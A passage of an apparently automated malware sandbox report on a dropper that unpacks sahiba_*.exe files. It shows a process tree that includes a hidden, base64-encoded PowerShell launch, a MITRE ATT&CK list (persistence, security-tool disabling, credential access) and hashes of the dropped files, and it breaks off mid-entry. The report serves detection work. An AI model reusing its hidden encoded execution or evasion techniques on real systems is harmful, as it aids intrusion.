                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4772
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c sahiba_9.exe
                                                            3⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:4328
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_9.exe
                                                              sahiba_9.exe
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:4776
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_9.exe
                                                                C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_9.exe
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:2300
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_9.exe
                                                                C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_9.exe
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4972
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 260 -ip 260
                                                        1⤵
                                                          PID:3432
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1748 -ip 1748
                                                          1⤵
                                                            PID:4992
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1304 -ip 1304
                                                            1⤵
                                                              PID:1940
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4968 -ip 4968
                                                              1⤵
                                                                PID:2552
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 400 -ip 400
                                                                1⤵
                                                                  PID:4840
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1304 -ip 1304
                                                                  1⤵
                                                                    PID:1916
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1304 -ip 1304
                                                                    1⤵
                                                                      PID:3644
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 220 -ip 220
                                                                      1⤵
                                                                        PID:4700
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 400 -ip 400
                                                                        1⤵
                                                                          PID:4744
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1304 -ip 1304
                                                                          1⤵
                                                                            PID:4220
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4392 -ip 4392
                                                                            1⤵
                                                                              PID:1940
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4968 -ip 4968
                                                                              1⤵
                                                                                PID:3332
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4392 -ip 4392
                                                                                1⤵
                                                                                  PID:992
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 220 -ip 220
                                                                                  1⤵
                                                                                    PID:4624
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1304 -ip 1304
                                                                                    1⤵
                                                                                      PID:1240
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1304 -ip 1304
                                                                                      1⤵
                                                                                        PID:4616
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1304 -ip 1304
                                                                                        1⤵
                                                                                          PID:2336
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1304 -ip 1304
                                                                                          1⤵
                                                                                            PID:948
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1304 -ip 1304
                                                                                            1⤵
                                                                                              PID:1840
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 1184 -ip 1184
                                                                                              1⤵
                                                                                                PID:4384
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                1⤵
                                                                                                  PID:3664
                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                    2⤵
                                                                                                      PID:1216
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                    1⤵
                                                                                                      PID:1528
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                      1⤵
                                                                                                        PID:1484
                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                        1⤵
                                                                                                          PID:4596
                                                                                                        • C:\Users\Admin\AppData\Roaming\fceatfc
                                                                                                          C:\Users\Admin\AppData\Roaming\fceatfc
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:3720

                                                                                                        Network

                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                        Execution

                                                                                                        Scheduled Task

                                                                                                        1
                                                                                                        T1053

                                                                                                        Persistence

                                                                                                        Modify Existing Service

                                                                                                        1
                                                                                                        T1031

                                                                                                        Registry Run Keys / Startup Folder

                                                                                                        1
                                                                                                        T1060

                                                                                                        Scheduled Task

                                                                                                        1
                                                                                                        T1053

                                                                                                        Privilege Escalation

                                                                                                        Scheduled Task

                                                                                                        1
                                                                                                        T1053

                                                                                                        Defense Evasion

                                                                                                        Modify Registry

                                                                                                        3
                                                                                                        T1112

                                                                                                        Disabling Security Tools

                                                                                                        1
                                                                                                        T1089

                                                                                                        Virtualization/Sandbox Evasion

                                                                                                        1
                                                                                                        T1497

                                                                                                        Install Root Certificate

                                                                                                        1
                                                                                                        T1130

                                                                                                        Credential Access

                                                                                                        Credentials in Files

                                                                                                        3
                                                                                                        T1081

                                                                                                        Discovery

                                                                                                        Query Registry

                                                                                                        7
                                                                                                        T1012

                                                                                                        Virtualization/Sandbox Evasion

                                                                                                        1
                                                                                                        T1497

                                                                                                        System Information Discovery

                                                                                                        7
                                                                                                        T1082

                                                                                                        Peripheral Device Discovery

                                                                                                        1
                                                                                                        T1120

                                                                                                        Process Discovery

                                                                                                        1
                                                                                                        T1057

                                                                                                        Collection

                                                                                                        Data from Local System

                                                                                                        3
                                                                                                        T1005

                                                                                                        Command and Control

                                                                                                        Web Service

                                                                                                        1
                                                                                                        T1102

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sahiba_9.exe.log
                                                                                                          MD5

                                                                                                          3654bd2c6957761095206ffdf92b0cb9

                                                                                                          SHA1

                                                                                                          6f10f7b5867877de7629afcff644c265e79b4ad3

                                                                                                          SHA256

                                                                                                          c2a4be94cf4ed33d698d9838f4ffb47047da796e733ec11562463a1621212ab4

                                                                                                          SHA512

                                                                                                          e2a81248cca7732ce098088d5237897493fd3629e28d66bc13e5f9191f72cd52893f4a53905906af12d5c6de475738b6c7f6b718a32869e9ee0deb3a54672f79

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libcurl.dll
                                                                                                          MD5

                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                          SHA1

                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                          SHA256

                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                          SHA512

                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libcurl.dll
                                                                                                          MD5

                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                          SHA1

                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                          SHA256

                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                          SHA512

                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libcurlpp.dll
                                                                                                          MD5

                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                          SHA1

                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                          SHA256

                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                          SHA512

                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libcurlpp.dll
                                                                                                          MD5

                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                          SHA1

                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                          SHA256

                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                          SHA512

                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libgcc_s_dw2-1.dll
                                                                                                          MD5

                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                          SHA1

                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                          SHA256

                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                          SHA512

                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libgcc_s_dw2-1.dll
                                                                                                          MD5

                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                          SHA1

                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                          SHA256

                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                          SHA512

                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libgcc_s_dw2-1.dll
                                                                                                          MD5

                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                          SHA1

                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                          SHA256

                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                          SHA512

                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libstdc++-6.dll
                                                                                                          MD5

                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                          SHA1

                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                          SHA256

                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                          SHA512

                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libstdc++-6.dll
                                                                                                          MD5

                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                          SHA1

                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                          SHA256

                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                          SHA512

                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libwinpthread-1.dll
                                                                                                          MD5

                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                          SHA1

                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                          SHA256

                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                          SHA512

                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\libwinpthread-1.dll
                                                                                                          MD5

                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                          SHA1

                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                          SHA256

                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                          SHA512

                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_1.exe
                                                                                                          MD5

                                                                                                          151ac4868889bf34489fec00289e2b68

                                                                                                          SHA1

                                                                                                          2e7b27cf334c64b0b28c5ca5742b4d920fa0434b

                                                                                                          SHA256

                                                                                                          0c1132ab8af5e8649d2b2402f57d99447b4e798db85529926cb1290c50a342b0

                                                                                                          SHA512

                                                                                                          e1cae09dff04003ac5c411417ea4823031fec189274762369c07b8505d1cef45404e91cff03039dac41c47f1468675f4f7262716e81e92051db5a8fd52439bb9

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_1.txt
                                                                                                          MD5

                                                                                                          151ac4868889bf34489fec00289e2b68

                                                                                                          SHA1

                                                                                                          2e7b27cf334c64b0b28c5ca5742b4d920fa0434b

                                                                                                          SHA256

                                                                                                          0c1132ab8af5e8649d2b2402f57d99447b4e798db85529926cb1290c50a342b0

                                                                                                          SHA512

                                                                                                          e1cae09dff04003ac5c411417ea4823031fec189274762369c07b8505d1cef45404e91cff03039dac41c47f1468675f4f7262716e81e92051db5a8fd52439bb9

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_2.exe
                                                                                                          MD5

                                                                                                          05256e203e83dd874f79648326a92a4c

                                                                                                          SHA1

                                                                                                          d70651a3a855e3db4061f00377abb0d5a2e053db

                                                                                                          SHA256

                                                                                                          22e21114c7706f72f1f02014470b188731f4a6d8347c63f741520b22d4a3a720

                                                                                                          SHA512

                                                                                                          5c1d49948c0491b8f667c0e78e6092fd556adf64c6c50343d501f93134f494fcec80665b4de03f338b1645bf12134c35992ee15de96bc2532ed4aea54dd59ee3

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_2.txt
                                                                                                          MD5

                                                                                                          05256e203e83dd874f79648326a92a4c

                                                                                                          SHA1

                                                                                                          d70651a3a855e3db4061f00377abb0d5a2e053db

                                                                                                          SHA256

                                                                                                          22e21114c7706f72f1f02014470b188731f4a6d8347c63f741520b22d4a3a720

                                                                                                          SHA512

                                                                                                          5c1d49948c0491b8f667c0e78e6092fd556adf64c6c50343d501f93134f494fcec80665b4de03f338b1645bf12134c35992ee15de96bc2532ed4aea54dd59ee3

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_3.exe
                                                                                                          MD5

                                                                                                          9ceca5cb5bbc4d64509e2d8fdef1c4f9

                                                                                                          SHA1

                                                                                                          b14bfa6fdd325570c6e5cb5867f32306c7eb0596

                                                                                                          SHA256

                                                                                                          6ee2661159ad8558362f1d3c0e02cbb7ea8d35dbcc255f9835d6a05a4c959de6

                                                                                                          SHA512

                                                                                                          2cb6aad4c7928fd78a5f0fd3f7998c7432915ab32c69da76a4a22cc8b6ad3da3f545d9993501b076e4051a3984bfd3b53098b5cda19863daae7c6dac2bd6cbd5

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_3.txt
                                                                                                          MD5

                                                                                                          9ceca5cb5bbc4d64509e2d8fdef1c4f9

                                                                                                          SHA1

                                                                                                          b14bfa6fdd325570c6e5cb5867f32306c7eb0596

                                                                                                          SHA256

                                                                                                          6ee2661159ad8558362f1d3c0e02cbb7ea8d35dbcc255f9835d6a05a4c959de6

                                                                                                          SHA512

                                                                                                          2cb6aad4c7928fd78a5f0fd3f7998c7432915ab32c69da76a4a22cc8b6ad3da3f545d9993501b076e4051a3984bfd3b53098b5cda19863daae7c6dac2bd6cbd5

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_4.exe
                                                                                                          MD5

                                                                                                          5668cb771643274ba2c375ec6403c266

                                                                                                          SHA1

                                                                                                          dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                          SHA256

                                                                                                          d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                          SHA512

                                                                                                          135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_4.txt
                                                                                                          MD5

                                                                                                          5668cb771643274ba2c375ec6403c266

                                                                                                          SHA1

                                                                                                          dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                          SHA256

                                                                                                          d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                          SHA512

                                                                                                          135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_5.exe
                                                                                                          MD5

                                                                                                          8c4df9d37195987ede03bf8adb495686

                                                                                                          SHA1

                                                                                                          010626025ca791720f85984a842c893b78f439d2

                                                                                                          SHA256

                                                                                                          5207c76c2e29a2f9951dc4697199a89fdd9516a324f4df7fa04184c3942cc185

                                                                                                          SHA512

                                                                                                          8fcb279c27682e13ec716e250c9d87cd3d9447b6376e4e6b97e8a283994c02eeac112f2e2c60d4e6316ece5e11fd992cd06efa48c72ee7b0c306b16347698655

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_5.txt
                                                                                                          MD5

                                                                                                          8c4df9d37195987ede03bf8adb495686

                                                                                                          SHA1

                                                                                                          010626025ca791720f85984a842c893b78f439d2

                                                                                                          SHA256

                                                                                                          5207c76c2e29a2f9951dc4697199a89fdd9516a324f4df7fa04184c3942cc185

                                                                                                          SHA512

                                                                                                          8fcb279c27682e13ec716e250c9d87cd3d9447b6376e4e6b97e8a283994c02eeac112f2e2c60d4e6316ece5e11fd992cd06efa48c72ee7b0c306b16347698655

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_6.exe
                                                                                                          MD5

                                                                                                          dae14fe61d968fb25b83887171b84238

                                                                                                          SHA1

                                                                                                          67c256d1c51b6dba818d9a556c9ef374241a4450

                                                                                                          SHA256

                                                                                                          e47c276aa5227157fb2eddf4a8451d75ab0573d19c79a2f99c29c42509b366a1

                                                                                                          SHA512

                                                                                                          4144f72c2e9cbc3eab0e7ad77f1dd167c56c21ed00740404bcba34caa7e17a832f30243601d456e5a7e1472aed8b15f939ad3fc3b635c6ea810bba1726edc155

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_6.txt
                                                                                                          MD5

                                                                                                          dae14fe61d968fb25b83887171b84238

                                                                                                          SHA1

                                                                                                          67c256d1c51b6dba818d9a556c9ef374241a4450

                                                                                                          SHA256

                                                                                                          e47c276aa5227157fb2eddf4a8451d75ab0573d19c79a2f99c29c42509b366a1

                                                                                                          SHA512

                                                                                                          4144f72c2e9cbc3eab0e7ad77f1dd167c56c21ed00740404bcba34caa7e17a832f30243601d456e5a7e1472aed8b15f939ad3fc3b635c6ea810bba1726edc155

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_7.exe
                                                                                                          MD5

                                                                                                          a73c42ca8cdc50ffefdd313e2ba4d423

                                                                                                          SHA1

                                                                                                          7fcc3b60e169fe3c64935de7e431654f570d9dd2

                                                                                                          SHA256

                                                                                                          c7dcc52d680abbfa5fa776d2b9ffa1a8360247617d6bef553a29da8356590f0b

                                                                                                          SHA512

                                                                                                          2bf103b2219839c3c17c88dc3248460dc518c5408a5deb5bea80a48ee713b3900c3b1dad8e27f643c01d49ad471761aaa5b0d53c3d507d96a5d92ca5517dac99

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_7.txt
                                                                                                          MD5

                                                                                                          a73c42ca8cdc50ffefdd313e2ba4d423

                                                                                                          SHA1

                                                                                                          7fcc3b60e169fe3c64935de7e431654f570d9dd2

                                                                                                          SHA256

                                                                                                          c7dcc52d680abbfa5fa776d2b9ffa1a8360247617d6bef553a29da8356590f0b

                                                                                                          SHA512

                                                                                                          2bf103b2219839c3c17c88dc3248460dc518c5408a5deb5bea80a48ee713b3900c3b1dad8e27f643c01d49ad471761aaa5b0d53c3d507d96a5d92ca5517dac99

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_8.exe
                                                                                                          MD5

                                                                                                          46300e1892f3afed128762ffbfe59131

                                                                                                          SHA1

                                                                                                          83daef2b8c32a1ddd5adc731e8b2baaf2f1486b0

                                                                                                          SHA256

                                                                                                          7c78cefa8f5b7f1274c60363210067a5458ea8cfc4714c26ff96b3212b3ab840

                                                                                                          SHA512

                                                                                                          0240071aba53b2e0d0d7e39cafa3e8c9c0d7f728ee6a4aadf13a7566f55e5c9ba7f9981454855275a9690d94e8b5c7760a675d06d95f4bf9cfccdfcccb49650b

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_8.txt
                                                                                                          MD5

                                                                                                          46300e1892f3afed128762ffbfe59131

                                                                                                          SHA1

                                                                                                          83daef2b8c32a1ddd5adc731e8b2baaf2f1486b0

                                                                                                          SHA256

                                                                                                          7c78cefa8f5b7f1274c60363210067a5458ea8cfc4714c26ff96b3212b3ab840

                                                                                                          SHA512

                                                                                                          0240071aba53b2e0d0d7e39cafa3e8c9c0d7f728ee6a4aadf13a7566f55e5c9ba7f9981454855275a9690d94e8b5c7760a675d06d95f4bf9cfccdfcccb49650b

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_9.exe
                                                                                                          MD5

                                                                                                          45718979b55d4e6512fcda91f7396b5f

                                                                                                          SHA1

                                                                                                          6db821e00e09504182323ef39857d4072c7d66e2

                                                                                                          SHA256

                                                                                                          cbd9ea9ace434652f4d12228912c681181bbd76b5db76b14a73f8eaee94bb3cc

                                                                                                          SHA512

                                                                                                          f8fda3231b3c811604e70777b700692d67fb47038ebdc087fae006103edfff6f2e14c79ae0406c229e68ae255cfae888471cc54991eb550329618ddd622ce1bf

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_9.exe
                                                                                                          MD5

                                                                                                          45718979b55d4e6512fcda91f7396b5f

                                                                                                          SHA1

                                                                                                          6db821e00e09504182323ef39857d4072c7d66e2

                                                                                                          SHA256

                                                                                                          cbd9ea9ace434652f4d12228912c681181bbd76b5db76b14a73f8eaee94bb3cc

                                                                                                          SHA512

                                                                                                          f8fda3231b3c811604e70777b700692d67fb47038ebdc087fae006103edfff6f2e14c79ae0406c229e68ae255cfae888471cc54991eb550329618ddd622ce1bf

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_9.exe
                                                                                                          MD5

                                                                                                          45718979b55d4e6512fcda91f7396b5f

                                                                                                          SHA1

                                                                                                          6db821e00e09504182323ef39857d4072c7d66e2

                                                                                                          SHA256

                                                                                                          cbd9ea9ace434652f4d12228912c681181bbd76b5db76b14a73f8eaee94bb3cc

                                                                                                          SHA512

                                                                                                          f8fda3231b3c811604e70777b700692d67fb47038ebdc087fae006103edfff6f2e14c79ae0406c229e68ae255cfae888471cc54991eb550329618ddd622ce1bf

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_9.txt
                                                                                                          MD5

                                                                                                          45718979b55d4e6512fcda91f7396b5f

                                                                                                          SHA1

                                                                                                          6db821e00e09504182323ef39857d4072c7d66e2

                                                                                                          SHA256

                                                                                                          cbd9ea9ace434652f4d12228912c681181bbd76b5db76b14a73f8eaee94bb3cc

                                                                                                          SHA512

                                                                                                          f8fda3231b3c811604e70777b700692d67fb47038ebdc087fae006103edfff6f2e14c79ae0406c229e68ae255cfae888471cc54991eb550329618ddd622ce1bf

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\setup_install.exe
                                                                                                          MD5

                                                                                                          00c8efa126f471b70123795500bb411d

                                                                                                          SHA1

                                                                                                          9d5d892af6126076387697fcdb8a6e0944934c80

                                                                                                          SHA256

                                                                                                          a4a2aa11f0f5d332336176320570c99dbe1fd6454600693962a50000f0347580

                                                                                                          SHA512

                                                                                                          5a6d4dfd51c7a85d296b7393599aec27bdf8b6893a98a88f7ca116f00339980309517c9ac8ef262fccffb51d713e678173fecda14544451fa22800264f9f4965

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\setup_install.exe
                                                                                                          MD5

                                                                                                          00c8efa126f471b70123795500bb411d

                                                                                                          SHA1

                                                                                                          9d5d892af6126076387697fcdb8a6e0944934c80

                                                                                                          SHA256

                                                                                                          a4a2aa11f0f5d332336176320570c99dbe1fd6454600693962a50000f0347580

                                                                                                          SHA512

                                                                                                          5a6d4dfd51c7a85d296b7393599aec27bdf8b6893a98a88f7ca116f00339980309517c9ac8ef262fccffb51d713e678173fecda14544451fa22800264f9f4965

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\CC4F.tmp
                                                                                                          MD5

                                                                                                          4f3387277ccbd6d1f21ac5c07fe4ca68

                                                                                                          SHA1

                                                                                                          e16506f662dc92023bf82def1d621497c8ab5890

                                                                                                          SHA256

                                                                                                          767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac

                                                                                                          SHA512

                                                                                                          9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                          MD5

                                                                                                          13abe7637d904829fbb37ecda44a1670

                                                                                                          SHA1

                                                                                                          de26b60d2c0b1660220caf3f4a11dfabaa0e7b9f

                                                                                                          SHA256

                                                                                                          7a20b34c0f9b516007d40a570eafb782028c5613138e8b9697ca398b0b3420d6

                                                                                                          SHA512

                                                                                                          6e02ca1282f3d1bbbb684046eb5dcef412366a0ed2276c1f22d2f16b978647c0e35a8d728a0349f022295b0aba30139b2b8bb75b92aa5fdcc18aae9dcf357d77

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                          MD5

                                                                                                          7d50e41fedea9c1b46139b98629b5ba9

                                                                                                          SHA1

                                                                                                          f395975657a459c3e07b18b8a7f7dbd515cb3334

                                                                                                          SHA256

                                                                                                          07a6792d711d3fbea313b9c8273e49dc46d864a053bef0bf0368969560bb7dec

                                                                                                          SHA512

